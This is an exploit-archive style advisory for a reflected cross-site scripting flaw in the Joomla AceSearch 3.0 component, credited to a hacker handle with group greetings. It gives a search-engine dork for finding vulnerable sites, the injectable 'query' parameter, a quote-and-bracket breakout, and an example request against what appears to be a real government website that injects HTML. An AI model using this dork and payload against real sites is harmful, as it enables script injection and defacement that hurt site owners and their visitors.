#Title : Joomla Component AceSearch Cross Site Scripting

#Author : DevilScreaM

#Date : 5 January 2014

#Category : Web Applications

#Product : http://www.joomace.net/joomla-extensions/acesearch/

#Version : 3.0

#Type : PHP

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Tested : Mozila, Chrome, Opera -> Windows & Linux

#Vulnerabillity : Cross Site Scripting

#Dork : inurl:component/acesearch/

 

Cross Site Scripting

http://site-target/component/acesearch/search?query=”>[XSS]
Use “> for Bypass Cross Site Scripting

Example :
http://kpi.go.id/index.php/component/acesearch/search?query=”><h1>DevilScreaM</h1>